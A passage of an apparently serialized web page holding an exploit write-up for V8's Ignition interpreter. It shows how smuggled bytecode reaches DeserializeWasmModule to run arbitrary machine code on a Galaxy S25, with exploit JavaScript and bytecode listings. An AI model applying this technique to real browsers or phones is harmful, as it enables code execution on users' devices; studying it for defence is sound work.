a207",{"type":24,"tag":301,"props":139352,"children":139353},{"style":385},[139354],{"type":30,"value":2537},{"type":24,"tag":301,"props":139356,"children":139357},{"style":466},[139358],{"type":30,"value":139334},{"type":24,"tag":301,"props":139360,"children":139361},{"style":359},[139362],{"type":30,"value":492},{"type":24,"tag":301,"props":139364,"children":139365},{"class":303,"line":335},[139366,139370,139375,139379,139383],{"type":24,"tag":301,"props":139367,"children":139368},{"style":348},[139369],{"type":30,"value":3258},{"type":24,"tag":301,"props":139371,"children":139372},{"style":369},[139373],{"type":30,"value":139374}," a208",{"type":24,"tag":301,"props":139376,"children":139377},{"style":385},[139378],{"type":30,"value":2537},{"type":24,"tag":301,"props":139380,"children":139381},{"style":466},[139382],{"type":30,"value":139334},{"type":24,"tag":301,"props":139384,"children":139385},{"style":359},[139386],{"type":30,"value":492},{"type":24,"tag":301,"props":139388,"children":139389},{"class":303,"line":344},[139390,139394,139399,139403,139407],{"type":24,"tag":301,"props":139391,"children":139392},{"style":348},[139393],{"type":30,"value":3258},{"type":24,"tag":301,"props":139395,"children":139396},{"style":369},[139397],{"type":30,"value":139398}," a209",{"type":24,"tag":301,"props":139400,"children":139401},{"style":385},[139402],{"type":30,"value":2537},{"type":24,"tag":301,"props":139404,"children":139405},{"style":466},[139406],{"type":30,"value":139334},{"type":24,"tag":301,"props":139408,"children":139409},{"style":359},[139410],{"type":30,"value":492},{"type":24,"tag":301,"props":139412,"children":139413},{"class":303,"line":401},[139414,139418,139423,139427,139431],{"type":24,"tag":301,"props":139415,"children":139416},{"style":348},[139417],{"type":30,"value":3258},{"type":24,"tag":301,"props":139419,"children":139420},{"style":369},[139421],{"type":30,"value":139422}," a210",{"type":24,"tag":301,"props":139424,"children":139425},{"style":385},[139426],{"type":30,"value":2537},{"type":24,"tag":301,"props":139428,"children":139429},{"style":466},[139430],{"type":30,"value":139334},{"type":24,"tag":301,"props":139432,"children":139433},{"style":359},[139434],{"type":30,"value":492},{"type":24,"tag":301,"props":139436,"children":139437},{"class":303,"line":415},[139438,139442,139447,139451,139455],{"type":24,"tag":301,"props":139439,"children":139440},{"style":348},[139441],{"type":30,"value":3258},{"type":24,"tag":301,"props":139443,"children":139444},{"style":369},[139445],{"type":30,"value":139446}," a211",{"type":24,"tag":301,"props":139448,"children":139449},{"style":385},[139450],{"type":30,"value":2537},{"type":24,"tag":301,"props":139452,"children":139453},{"style":466},[139454],{"type":30,"value":139334},{"type":24,"tag":301,"props":139456,"children":139457},{"style":359},[139458],{"type":30,"value":492},{"type":24,"tag":301,"props":139460,"children":139461},{"class":303,"line":439},[139462,139466,139471,139475,139479],{"type":24,"tag":301,"props":139463,"children":139464},{"style":348},[139465],{"type":30,"value":3258},{"type":24,"tag":301,"props":139467,"children":139468},{"style":369},[139469],{"type":30,"value":139470}," a212",{"type":24,"tag":301,"props":139472,"children":139473},{"style":385},[139474],{"type":30,"value":2537},{"type":24,"tag":301,"props":139476,"children":139477},{"style":466},[139478],{"type":30,"value":139334},{"type":24,"tag":301,"props":139480,"children":139481},{"style":359},[139482],{"type":30,"value":492},{"type":24,"tag":32,"props":139484,"children":139485},{},[139486],{"type":30,"value":139487},"Those instructions result in:",{"type":24,"tag":291,"props":139489,"children":139491},{"code":139490},"00: LdaTrue;\n01: LdaTrue;\n02: Jump +8; >------------+\n04: Star rX + LdaSmi ... |\nv--------------------------+\n0a: LdaTrue;\n0b: LdaTrue;\n",[139492],{"type":24,"tag":145,"props":139493,"children":139494},{"__ignoreMap":7},[139495],{"type":30,"value":139490},{"type":24,"tag":32,"props":139497,"children":139498},{},[139499,139501,139507,139509,139513],{"type":30,"value":139500},"(The offset of ",{"type":24,"tag":145,"props":139502,"children":139504},{"className":139503},[],[139505],{"type":30,"value":139506},"Jump",{"type":30,"value":139508}," instructions is added to the ",{"type":24,"tag":5422,"props":139510,"children":139511},{},[139512],{"type":30,"value":77803},{"type":30,"value":139514}," of the instruction.)",{"type":24,"tag":32,"props":139516,"children":139517},{},[139518,139520,139526],{"type":30,"value":139519},"Now, 3 out of the 6 bytes in a ",{"type":24,"tag":145,"props":139521,"children":139523},{"className":139522},[],[139524],{"type":30,"value":139525},"LdaSmi.ExtraWide",{"type":30,"value":139527}," instruction are valid for merging into the smuggled arbitrary Ignition bytecode. This slide made exploit development a lot easier, as any additional code would cause the exception table to have new offsets.",{"type":24,"tag":80,"props":139529,"children":139531},{"id":139530},"exploit-goal",[139532],{"type":30,"value":139533},"Exploit Goal",{"type":24,"tag":32,"props":139535,"children":139536},{},[139537,139539,139545,139546,139552],{"type":30,"value":139538},"Initially we considered using ",{"type":24,"tag":145,"props":139540,"children":139542},{"className":139541},[],[139543],{"type":30,"value":139544},"Star",{"type":30,"value":1036},{"type":24,"tag":145,"props":139547,"children":139549},{"className":139548},[],[139550],{"type":30,"value":139551},"Ldar",{"type":30,"value":139553}," instructions to store to out-of-bounds register indexes, as registers are stored on the regular stack. However, with only 2 bytes we can only access +/- 0x7f registers, which does not allow us to go out of bounds enough to access interesting values.",{"type":24,"tag":32,"props":139555,"children":139556},{},[139557,139559,139566],{"type":30,"value":139558},"We realized that register offsets 0 and 1 contain the saved frame pointer and return address respectively. We considered using this to ",{"type":24,"tag":188,"props":139560,"children":139563},{"href":139561,"rel":139562},"https://github.com/google/google-ctf/tree/main/2023/quals/sandbox-v8box/solution",[192],[139564],{"type":30,"value":139565},"stack pivot and ROP",{"type":30,"value":139567},". However, there were numerous downsides - primarily, we would need multiple leaks of binary addresses and the JS heap (to construct a buffer with a fake stack frame).",{"type":24,"tag":32,"props":139569,"children":139570},{},[139571],{"type":30,"value":139572},"Additionally, the interpreter expects all values to be tagged V8 values (i.e. 32-bit compressed pointers or Smis). This means that operating on 64-bit addresses can cause surprising truncations or 'untagging' extensions.",{"type":24,"tag":32,"props":139574,"children":139575},{},[139576],{"type":30,"value":139577},"Finally, ROP/stack pivoting-based approaches would cause significant work when porting from our x86_64 development machines to the aarch64 target device, and might not even be feasible given the existence of PAC and BTI on the Galaxy S25.",{"type":24,"tag":32,"props":139579,"children":139580},{},[139581,139583,139589,139591,139597,139599,139605],{"type":30,"value":139582},"At this point, we identified an interesting opcode: ",{"type":24,"tag":145,"props":139584,"children":139586},{"className":139585},[],[139587],{"type":30,"value":139588},"CallRuntime",{"type":30,"value":139590},". Runtime functions are used to implement a lot of core V8 functionality, and are native functions exposed to bytecode (but not to the user, unless ",{"type":24,"tag":145,"props":139592,"children":139594},{"className":139593},[],[139595],{"type":30,"value":139596},"--allow-natives-syntax",{"type":30,"value":139598}," is enabled). Many of these allow powerful functionality as inputs are assumed to be trusted, but one stands out: ",{"type":24,"tag":145,"props":139600,"children":139602},{"className":139601},[],[139603],{"type":30,"value":139604},"DeserializeWasmModule",{"type":30,"value":206},{"type":24,"tag":32,"props":139607,"children":139608},{},[139609,139611,139618,139619,139624,139625,139631,139633,139639],{"type":30,"value":139610},"WebAssembly modules may be internally serialized and deserialized by the runtime - this serialization format includes raw machine code for any ",{"type":24,"tag":188,"props":139612,"children":139615},{"href":139613,"rel":139614},"https://gist.github.com/Riatre/83d5fdb970946c8e185c5e1b2b842b1b",[192],[139616],{"type":30,"value":139617},"JIT-compiled functions",{"type":30,"value":6319},{"type":24,"tag":145,"props":139620,"children":139622},{"className":139621},[],[139623],{"type":30,"value":139604},{"type":30,"value":1036},{"type":24,"tag":145,"props":139626,"children":139628},{"className":139627},[],[139629],{"type":30,"value":139630},"SerializeWasmModule",{"type":30,"value":139632}," themselves are only used from test functions, and indeed have been ",{"type":24,"tag":188,"props":139634,"children":139637},{"href":139635,"rel":139636},"https://chromium-review.googlesource.com/c/v8/v8/+/6875821",[192],[139638],{"type":30,"value":3321},{"type":30,"value":139640}," from recent production V8 builds due to how abusable this functionality is.",{"type":24,"tag":32,"props":139642,"children":139643},{},[139644,139646,139652,139654,139660,139662,139667,139669,139675,139677,139682,139683,139688,139689,139694,139696,139702,139704,139708],{"type":30,"value":139645},"However, calling this opcode represented a significant challenge:\n",{"type":24,"tag":145,"props":139647,"children":139649},{"className":139648},[],[139650],{"type":30,"value":139651},"CallRuntime \u003Cfunc-id> \u003Cargs> \u003Cargc>",{"type":30,"value":139653},"\nWhere ",{"type":24,"tag":145,"props":139655,"children":139657},{"className":139656},[],[139658],{"type":30,"value":139659},"func-id",{"type":30,"value":139661}," is a 2-byte function ID, ",{"type":24,"tag":145,"props":139663,"children":139665},{"className":139664},[],[139666],{"type":30,"value":44967},{"type":30,"value":139668}," is the index of the last register passed and ",{"type":24,"tag":145,"props":139670,"children":139672},{"className":139671},[],[139673],{"type":30,"value":139674},"argc",{"type":30,"value":139676}," is the number of arguments passed (e.g. passing ",{"type":24,"tag":145,"props":139678,"children":139680},{"className":139679},[],[139681],{"type":30,"value":51117},{"type":30,"value":377},{"type":24,"tag":145,"props":139684,"children":139686},{"className":139685},[],[139687],{"type":30,"value":51260},{"type":30,"value":2378},{"type":24,"tag":145,"props":139690,"children":139692},{"className":139691},[],[139693],{"type":30,"value":51243},{"type":30,"value":139695}," would be encoded as ",{"type":24,"tag":145,"props":139697,"children":139699},{"className":139698},[],[139700],{"type":30,"value":139701},"\u003Cr2> \u003C3>",{"type":30,"value":139703},").\nThis requires ",{"type":24,"tag":5422,"props":139705,"children":139706},{},[139707],{"type":30,"value":24886},{"type":30,"value":139709}," bytes of control - additionally, we must then store the accumulator safely into a register, then return the value back to JS code.",{"type":24,"tag":80,"props":139711,"children":139713},{"id":139712},"better-bytecode-control",[139714],{"type":30,"value":139715},"Better Bytecode Control",{"type":24,"tag":32,"props":139717,"children":139718},{},[139719,139721,139728,139730,139736],{"type":30,"value":139720},"Luckily, arithmetic instructions in Ignition have a feature known as the '",{"type":24,"tag":188,"props":139722,"children":139725},{"href":139723,"rel":139724},"https://benediktmeurer.de/2017/12/13/an-introduction-to-speculative-optimization-in-v8/",[192],[139726],{"type":30,"value":139727},"feedback vector slot",{"type":30,"value":139729},"', where it stores profiling information for subsequent optimizations by Turbofan. Observationally, for the ",{"type":24,"tag":145,"props":139731,"children":139733},{"className":139732},[],[139734],{"type":30,"value":139735},"AddSmi",{"type":30,"value":139737}," instruction, it represents the number of operations performed on the target value so far.",{"type":24,"tag":32,"props":139739,"children":139740},{},[139741],{"type":30,"value":139742},"For example, we can look at the below Ignition disassembly:",{"type":24,"tag":291,"props":139744,"children":139746},{"code":139745},"2000 : 01 0d 11 11 93 0e LdaSmi.ExtraWide [244519185]\n2006 : cd Star1\n2007 : 00 1b ff ff 1d ff Mov.Wide \u003Ccontext>, r220\n2013 : 0b f8 Ldar r1\n2015 : 01 4b 11 11 93 0a 01 00 00 00 AddSmi.ExtraWide [177410321], [1]\n2025 : 0b f8 Ldar r1\n2027 : 01 4b 11 11 93 0a 02 00 00 00 AddSmi.ExtraWide [177410321], [2]\n2037 : 0b f8 Ldar r1\n2039 : 01 4b 11 11 93 0a 03 00 00 00 AddSmi.ExtraWide [177410321], [3]\n2049 : 0b f8 Ldar r1\n2051 : 01 4b 11 11 93 0a 04 00 00 00 AddSmi.ExtraWide [177410321], [4]\n2061 : 0b f8 Ldar r1\n2063 : 01 4b 11 11 93 0a 05 00 00 00 AddSmi.ExtraWide [177410321], [5]\n",[139747],{"type":24,"tag":145,"props":139748,"children":139749},{"__ignoreMap":7},[139750],{"type":30,"value":139745},{"type":24,"tag":32,"props":139752,"children":139753},{},[139754,139756,139762],{"type":30,"value":139755},"We can see the feedback vector slot increments for every operation. This means that with a smuggled jump slide through ",{"type":24,"tag":145,"props":139757,"children":139759},{"className":139758},[],[139760],{"type":30,"value":139761},"AddSmi.ExtraWide",{"type":30,"value":139763},", we can control almost 8 bytes (because of the SMI constraint) given enough addition instructions.",{"type":24,"tag":32,"props":139765,"children":139766},{},[139767],{"type":30,"value":139768},"Eventually, we can reach a stage like this:",{"type":24,"tag":291,"props":139770,"children":139772},{"code":139771},"4385774 : 01 4b 6c 66 02 04 02 93 05 00 AddSmi.ExtraWide [67266156], [365314]\n",[139773],{"type":24,"tag":145,"props":139774,"children":139775},{"__ignoreMap":7},[139776],{"type":30,"value":139771},{"type":24,"tag":32,"props":139778,"children":139779},{},[139780],{"type":30,"value":139781},"If you skip the first two bytes, you have",{"type":24,"tag":2655,"props":139783,"children":139784},{},[139785,139816],{"type":24,"tag":2659,"props":139786,"children":139787},{},[139788,139793,139795,139800,139802,139808,139810],{"type":24,"tag":145,"props":139789,"children":139791},{"className":139790},[],[139792],{"type":30,"value":139588},{"type":30,"value":139794}," (0x6c) to ",{"type":24,"tag":145,"props":139796,"children":139798},{"className":139797},[],[139799],{"type":30,"value":139604},{"type":30,"value":139801}," (0x0266) starting from register ",{"type":24,"tag":145,"props":139803,"children":139805},{"className":139804},[],[139806],{"type":30,"value":139807},"a2",{"type":30,"value":139809}," (0x4) with 2 arguments (0x2). This becomes the call: ",{"type":24,"tag":145,"props":139811,"children":139813},{"className":139812},[],[139814],{"type":30,"value":139815},"DeserializeWasmModule(a2, a1)",{"type":24,"tag":2659,"props":139817,"children":139818},{},[139819],{"type":30,"value":139820},"a Jump instruction",{"type":24,"tag":80,"props":139822,"children":139824},{"id":139823},"returning-back-to-js",[139825],{"type":30,"value":139826},"Returning Back to JS",{"type":24,"tag":32,"props":139828,"children":139829},{},[139830,139832,139838],{"type":30,"value":139831},"After that call, the result is stored in the accumulator. Since this function is an async generator, we have to ",{"type":24,"tag":145,"props":139833,"children":139835},{"className":139834},[],[139836],{"type":30,"value":139837},"yield",{"type":30,"value":139839}," the result, but that results in a long series of instructions that we can't possibly smuggle.",{"type":24,"tag":32,"props":139841,"children":139842},{},[139843],{"type":30,"value":139844},"The solution here is simple: we use the smuggled control flow to merge back into the normal control flow, that leads us into a yield from the original JS. For example, in our exploit, all the additions were done in a try block:",{"type":24,"tag":291,"props":139846,"children":139848},{"code":139847,"language":38121,"meta":7,"className":38119,"style":7},"try {\n ${'a1 + 0xa931111;'.repeat(0x059302 - 1)}\n a1 + 0x0402666c;\n throw 0x393e91a;\n} catch (e) {\n console.log(\"foo\");\n yield a16;\n}\n",[139849],{"type":24,"tag":145,"props":139850,"children":139851},{"__ignoreMap":7},[139852,139863,139910,139931,139947,139970,139998,140015],{"type":24,"tag":301,"props":139853,"children":139854},{"class":303,"line":304},[139855,139859],{"type":24,"tag":301,"props":139856,"children":139857},{"style":308},[139858],{"type":30,"value":55067},{"type":24,"tag":301,"props":139860,"children":139861},{"style":359},[139862],{"type":30,"value":3035},{"type":24,"tag":301,"props":139864,"children":139865},{"class":303,"line":320},[139866,139871,139875,139880,139884,139888,139892,139897,139901,139905],{"type":24,"tag":301,"props":139867,"children":139868},{"style":369},[139869],{"type":30,"value":139870}," $",{"type":24,"tag":301,"props":139872,"children":139873},{"style":359},[139874],{"type":30,"value":83330},{"type":24,"tag":301,"props":139876,"children":139877},{"style":329},[139878],{"type":30,"value":139879},"'a1 + 0xa931111;'",{"type":24,"tag":301,"props":139881,"children":139882},{"style":359},[139883],{"type":30,"value":206},{"type":24,"tag":301,"props":139885,"children":139886},{"style":314},[139887],{"type":30,"value":3394},{"type":24,"tag":301,"props":139889,"children":139890},{"style":359},[139891],{"type":30,"value":362},{"type":24,"tag":301,"props":139893,"children":139894},{"style":466},[139895],{"type":30,"value":139896},"0x059302",{"type":24,"tag":301,"props":139898,"children":139899},{"style":385},[139900],{"type":30,"value":3407},{"type":24,"tag":301,"props":139902,"children":139903},{"style":466},[139904],{"type":30,"value":487},{"type":24,"tag":301,"props":139906,"children":139907},{"style":359},[139908],{"type":30,"value":139909},")}\n",{"type":24,"tag":301,"props":139911,"children":139912},{"class":303,"line":335},[139913,139918,139922,139927],{"type":24,"tag":301,"props":139914,"children":139915},{"style":369},[139916],{"type":30,"value":139917}," a1",{"type":24,"tag":301,"props":139919,"children":139920},{"style":385},[139921],{"type":30,"value":957},{"type":24,"tag":301,"props":139923,"children":139924},{"style":466},[139925],{"type":30,"value":139926}," 0x0402666c",{"type":24,"tag":301,"props":139928,"children":139929},{"style":359},[139930],{"type":30,"value":492},{"type":24,"tag":301,"props":139932,"children":139933},{"class":303,"line":344},[139934,139938,139943],{"type":24,"tag":301,"props":139935,"children":139936},{"style":308},[139937],{"type":30,"value":41949},{"type":24,"tag":301,"props":139939,"children":139940},{"style":466},[139941],{"type":30,"value":139942}," 0x393e91a",{"type":24,"tag":301,"props":139944,"children":139945},{"style":359},[139946],{"type":30,"value":492},{"type":24,"tag":301,"props":139948,"children":139949},{"class":303,"line":401},[139950,139954,139958,139962,139966],{"type":24,"tag":301,"props":139951,"children":139952},{"style":359},[139953],{"type":30,"value":53610},{"type":24,"tag":301,"props":139955,"children":139956},{"style":308},[139957],{"type":30,"value":55146},{"type":24,"tag":301,"props":139959,"children":139960},{"style":359},[139961],{"type":30,"value":873},{"type":24,"tag":301,"props":139963,"children":139964},{"style":369},[139965],{"type":30,"value":58179},{"type":24,"tag":301,"props":139967,"children":139968},{"style":359},[139969],{"type":30,"value":398},{"type":24,"tag":301,"props":139971,"children":139972},{"class":303,"line":415},[139973,139977,139981,139985,139989,139994],{"type":24,"tag":301,"props":139974,"children":139975},{"style":369},[139976],{"type":30,"value":108640},{"type":24,"tag":301,"props":139978,"children":139979},{"style":359},[139980],{"type":30,"value":206},{"type":24,"tag":301,"props":139982,"children":139983},{"style":314},[139984],{"type":30,"value":108649},{"type":24,"tag":301,"props":139986,"children":139987},{"style":359},[139988],{"type":30,"value":362},{"type":24,"tag":301,"props":139990,"children":139991},{"style":329},[139992],{"type":30,"value":139993},"\"foo\"",{"type":24,"tag":301,"props":139995,"children":139996},{"style":359},[139997],{"type":30,"value":589},{"type":24,"tag":301,"props":139999,"children":140000},{"class":303,"line":439},[140001,140006,140011],{"type":24,"tag":301,"props":140002,"children":140003},{"style":308},[140004],{"type":30,"value":140005}," yield",{"type":24,"tag":301,"props":140007,"children":140008},{"style":369},[140009],{"type":30,"value":140010}," a16",{"type":24,"tag":301,"props":140012,"children":140013},{"style":359},[140014],{"type":30,"value":492},{"type":24,"tag":301,"props":140016,"children":140017},{"class":303,"line":447},[140018],{"type":24,"tag":301,"props":140019,"children":140020},{"style":359},[140021],{"type":30,"value":698},{"type":24,"tag":32,"props":140023,"children":140024},{},[140025,140027],{"type":30,"value":140026},"Starting from the final ",{"type":24,"tag":145,"props":140028,"children":140030},{"className":140029},[],[140031],{"type":30,"value":139735},{"type":24,"tag":291,"props":140033,"children":140035},{"code":140034}," 4385774 : 01 4b 6c 66 02 04 02 93 05 00 AddSmi.ExtraWide [67266156], [365314]\n 4385784 : 01 0d 1a e9 93 03 LdaSmi.ExtraWide [60025114]\n 4385790 : b1 Throw\n 4385791 : 00 1a 1a ff Star.Wide r223\n",[140036],{"type":24,"tag":145,"props":140037,"children":140038},{"__ignoreMap":7},[140039],{"type":30,"value":140034},{"type":24,"tag":32,"props":140041,"children":140042},{},[140043,140045,140050,140052,140058],{"type":30,"value":140044},"The smuggled jump in ",{"type":24,"tag":145,"props":140046,"children":140048},{"className":140047},[],[140049],{"type":30,"value":139735},{"type":30,"value":140051}," will redirect us to ",{"type":24,"tag":145,"props":140053,"children":140055},{"className":140054},[],[140056],{"type":30,"value":140057},"1a e9 93 03",{"type":30,"value":140059},", which results in:",{"type":24,"tag":2655,"props":140061,"children":140062},{},[140063,140074],{"type":24,"tag":2659,"props":140064,"children":140065},{},[140066,140072],{"type":24,"tag":145,"props":140067,"children":140069},{"className":140068},[],[140070],{"type":30,"value":140071},"Star r16",{"type":30,"value":140073}," (store accumulator to r16)",{"type":24,"tag":2659,"props":140075,"children":140076},{},[140077,140082],{"type":24,"tag":145,"props":140078,"children":140080},{"className":140079},[],[140081],{"type":30,"value":139506},{"type":30,"value":140083}," past the throw into the catch relevant code",{"type":24,"tag":32,"props":140085,"children":140086},{},[140087,140089,140095],{"type":30,"value":140088},"This will bring us nicely to the final ",{"type":24,"tag":145,"props":140090,"children":140092},{"className":140091},[],[140093],{"type":30,"value":140094},"yield a16",{"type":30,"value":140096},", and we now have a Deserialized Wasm Module with our own arbitrary machine code.",{"type":24,"tag":80,"props":140098,"children":140100},{"id":140099},"executing-shellcode",[140101],{"type":30,"value":140102},"Executing Shellcode",{"type":24,"tag":32,"props":140104,"children":140105},{},[140106],{"type":30,"value":140107},"To test this, we first serialize a small WebAssembly module and print the resulting Uint8Array:",{"type":24,"tag":291,"props":140109,"children":140111},{"code":140110,"language":3184,"meta":7,"className":3185,"style":7},"var wasm_code = new Uint8Array([\n 0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n 0, 0, 10, 4, 1, 2, 0, 11,\n]);\nvar mod = new WebAssembly.Module(wasm_code);\nvar inst = new WebAssembly.Instance(mod);\nvar func = inst.exports.shell;\n\n%WasmTierUpFunction(func);\nvar serialized = %SerializeWasmModule(mod);\nlet result = new Uint8Array(serialized);\nconsole.log('[' + result.join(', ') + ']');\n",[140112],{"type":24,"tag":145,"props":140113,"children":140114},{"__ignoreMap":7},[140115,140145,140372,140440,140447,140492,140538,140578,140585,140609,140646,140682],{"type":24,"tag":301,"props":140116,"children":140117},{"class":303,"line":304},[140118,140122,140127,140131,140135,140140],{"type":24,"tag":301,"props":140119,"children":140120},{"style":348},[140121],{"type":30,"value":41795},{"type":24,"tag":301,"props":140123,"children":140124},{"style":369},[140125],{"type":30,"value":140126}," wasm_code",{"type":24,"tag":301,"props":140128,"children":140129},{"style":385},[140130],{"type":30,"value":2537},{"type":24,"tag":301,"props":140132,"children":140133},{"style":348},[140134],{"type":30,"value":38685},{"type":24,"tag":301,"props":140136,"children":140137},{"style":314},[140138],{"type":30,"value":140139}," Uint8Array",{"type":24,"tag":301,"props":140141,"children":140142},{"style":359},[140143],{"type":30,"value":140144},"([\n",{"type":24,"tag":301,"props":140146,"children":140147},{"class":303,"line":320},[140148,140153,140157,140162,140166,140171,140175,140180,140184,140188,140192,140196,140200,140204,140208,140212,140216,140220,140224,140228,140232,140236,140240,140245,140249,140253,140257,140261,140265,140269,140273,140277,140281,140285,140289,140293,140297,140301,140305,140309,140313,140317,140321,140325,140329,140333,140337,140342,140346,140351,140355,140360,140364,140368],{"type":24,"tag":301,"props":140149,"children":140150},{"style":466},[140151],{"type":30,"value":140152}," 0",{"type":24,"tag":301,"props":140154,"children":140155},{"style":359},[140156],{"type":30,"value":377},{"type":24,"tag":301,"props":140158,"children":140159},{"style":466},[140160],{"type":30,"value":140161},"97",{"type":24,"tag":301,"props":140163,"children":140164},{"style":359},[140165],{"type":30,"value":377},{"type":24,"tag":301,"props":140167,"children":140168},{"style":466},[140169],{"type":30,"value":140170},"115",{"type":24,"tag":301,"props":140172,"children":140173},{"style":359},[140174],{"type":30,"value":377},{"type":24,"tag":301,"props":140176,"children":140177},{"style":466},[140178],{"type":30,"value":140179},"109",{"type":24,"tag":301,"props":140181,"children":140182},{"style":359},[140183],{"type":30,"value":377},{"type":24,"tag":301,"props":140185,"children":140186},{"style":466},[140187],{"type":30,"value":546},{"type":24,"tag":301,"props":140189,"children":140190},{"style":359},[140191],{"type":30,"value":377},{"type":24,"tag":301,"props":140193,"children":140194},{"style":466},[140195],{"type":30,"value":584},{"type":24,"tag":301,"props":140197,"children":140198},{"style":359},[140199],{"type":30,"value":377},{"type":24,"tag":301,"props":140201,"children":140202},{"style":466},[140203],{"type":30,"value":584},{"type":24,"tag":301,"props":140205,"children":140206},{"style":359},[140207],{"type":30,"value":377},{"type":24,"tag":301,"props":140209,"children":140210},{"style":466},[140211],{"type":30,"value":584},{"type":24,"tag":301,"props":140213,"children":140214},{"style":359},[140215],{"type":30,"value":377},{"type":24,"tag":301,"props":140217,"children":140218},{"style":466},[140219],{"type":30,"value":546},{"type":24,"tag":301,"props":140221,"children":140222},{"style":359},[140223],{"type":30,"value":377},{"type":24,"tag":301,"props":140225,"children":140226},{"style":466},[140227],{"type":30,"value":1761},{"type":24,"tag":301,"props":140229,"children":140230},{"style":359},[140231],{"type":30,"value":377},{"type":24,"tag":301,"props":140233,"children":140234},{"style":466},[140235],{"type":30,"value":546},{"type":24,"tag":301,"props":140237,"children":140238},{"style":359},[140239],{"type":30,"value":377},{"type":24,"tag":301,"props":140241,"children":140242},{"style":466},[140243],{"type":30,"value":140244},"96",{"type":24,"tag":301,"props":140246,"children":140247},{"style":359},[140248],{"type":30,"value":377},{"type":24,"tag":301,"props":140250,"children":140251},{"style":466},[140252],{"type":30,"value":584},{"type":24,"tag":301,"props":140254,"children":140255},{"style":359},[140256],{"type":30,"value":377},{"type":24,"tag":301,"props":140258,"children":140259},{"style":466},[140260],{"type":30,"value":584},{"type":24,"tag":301,"props":140262,"children":140263},{"style":359},[140264],{"type":30,"value":377},{"type":24,"tag":301,"props":140266,"children":140267},{"style":466},[140268],{"type":30,"value":1447},{"type":24,"tag":301,"props":140270,"children":140271},{"style":359},[140272],{"type":30,"value":377},{"type":24,"tag":301,"props":140274,"children":140275},{"style":466},[140276],{"type":30,"value":1503},{"type":24,"tag":301,"props":140278,"children":140279},{"style":359},[140280],{"type":30,"value":377},{"type":24,"tag":301,"props":140282,"children":140283},{"style":466},[140284],{"type":30,"value":546},{"type":24,"tag":301,"props":140286,"children":140287},{"style":359},[140288],{"type":30,"value":377},{"type":24,"tag":301,"props":140290,"children":140291},{"style":466},[140292],{"type":30,"value":584},{"type":24,"tag":301,"props":140294,"children":140295},{"style":359},[140296],{"type":30,"value":377},{"type":24,"tag":301,"props":140298,"children":140299},{"style":466},[140300],{"type":30,"value":61393},{"type":24,"tag":301,"props":140302,"children":140303},{"style":359},[140304],{"type":30,"value":377},{"type":24,"tag":301,"props":140306,"children":140307},{"style":466},[140308],{"type":30,"value":62606},{"type":24,"tag":301,"props":140310,"children":140311},{"style":359},[140312],{"type":30,"value":377},{"type":24,"tag":301,"props":140314,"children":140315},{"style":466},[140316],{"type":30,"value":546},{"type":24,"tag":301,"props":140318,"children":140319},{"style":359},[140320],{"type":30,"value":377},{"type":24,"tag":301,"props":140322,"children":140323},{"style":466},[140324],{"type":30,"value":24886},{"type":24,"tag":301,"props":140326,"children":140327},{"style":359},[140328],{"type":30,"value":377},{"type":24,"tag":301,"props":140330,"children":140331},{"style":466},[140332],{"type":30,"value":140170},{"type":24,"tag":301,"props":140334,"children":140335},{"style":359},[140336],{"type":30,"value":377},{"type":24,"tag":301,"props":140338,"children":140339},{"style":466},[140340],{"type":30,"value":140341},"104",{"type":24,"tag":301,"props":140343,"children":140344},{"style":359},[140345],{"type":30,"value":377},{"type":24,"tag":301,"props":140347,"children":140348},{"style":466},[140349],{"type":30,"value":140350},"101",{"type":24,"tag":301,"props":140352,"children":140353},{"style":359},[140354],{"type":30,"value":377},{"type":24,"tag":301,"props":140356,"children":140357},{"style":466},[140358],{"type":30,"value":140359},"108",{"type":24,"tag":301,"props":140361,"children":140362},{"style":359},[140363],{"type":30,"value":377},{"type":24,"tag":301,"props":140365,"children":140366},{"style":466},[140367],{"type":30,"value":140359},{"type":24,"tag":301,"props":140369,"children":140370},{"style":359},[140371],{"type":30,"value":1729},{"type":24,"tag":301,"props":140373,"children":140374},{"class":303,"line":335},[140375,140379,140383,140387,140391,140395,140399,140403,140407,140411,140415,140419,140423,140427,140431,140436],{"type":24,"tag":301,"props":140376,"children":140377},{"style":466},[140378],{"type":30,"value":140152},{"type":24,"tag":301,"props":140380,"children":140381},{"style":359},[140382],{"type":30,"value":377},{"type":24,"tag":301,"props":140384,"children":140385},{"style":466},[140386],{"type":30,"value":584},{"type":24,"tag":301,"props":140388,"children":140389},{"style":359},[140390],{"type":30,"value":377},{"type":24,"tag":301,"props":140392,"children":140393},{"style":466},[140394],{"type":30,"value":9505},{"type":24,"tag":301,"props":140396,"children":140397},{"style":359},[140398],{"type":30,"value":377},{"type":24,"tag":301,"props":140400,"children":140401},{"style":466},[140402],{"type":30,"value":1761},{"type":24,"tag":301,"props":140404,"children":140405},{"style":359},[140406],{"type":30,"value":377},{"type":24,"tag":301,"props":140408,"children":140409},{"style":466},[140410],{"type":30,"value":546},{"type":24,"tag":301,"props":140412,"children":140413},{"style":359},[140414],{"type":30,"value":377},{"type":24,"tag":301,"props":140416,"children":140417},{"style":466},[140418],{"type":30,"value":1503},{"type":24,"tag":301,"props":140420,"children":140421},{"style":359},[140422],{"type":30,"value":377},{"type":24,"tag":301,"props":140424,"children":140425},{"style":466},[140426],{"type":30,"value":584},{"type":24,"tag":301,"props":140428,"children":140429},{"style":359},[140430],{"type":30,"value":377},{"type":24,"tag":301,"props":140432,"children":140433},{"style":466},[140434],{"type":30,"value":140435},"11",{"type":24,"tag":301,"props":140437,"children":140438},{"style":359},[140439],{"type":30,"value":1729},{"type":24,"tag":301,"props":140441,"children":140442},{"class":303,"line":344},[140443],{"type":24,"tag":301,"props":140444,"children":140445},{"style":359},[140446],{"type":30,"value":10578},{"type":24,"tag":301,"props":140448,"children":140449},{"class":303,"line":401},[140450,140454,140458,140462,140466,140471,140475,140479,140483,140488],{"type":24,"tag":301,"props":140451,"children":140452},{"style":348},[140453],{"type":30,"value":41795},{"type":24,"tag":301,"props":140455,"children":140456},{"style":369},[140457],{"type":30,"value":78336},{"type":24,"tag":301,"props":140459,"children":140460},{"style":385},[140461],{"type":30,"value":2537},{"type":24,"tag":301,"props":140463,"children":140464},{"style":348},[140465],{"type":30,"value":38685},{"type":24,"tag":301,"props":140467,"children":140468},{"style":369},[140469],{"type":30,"value":140470}," 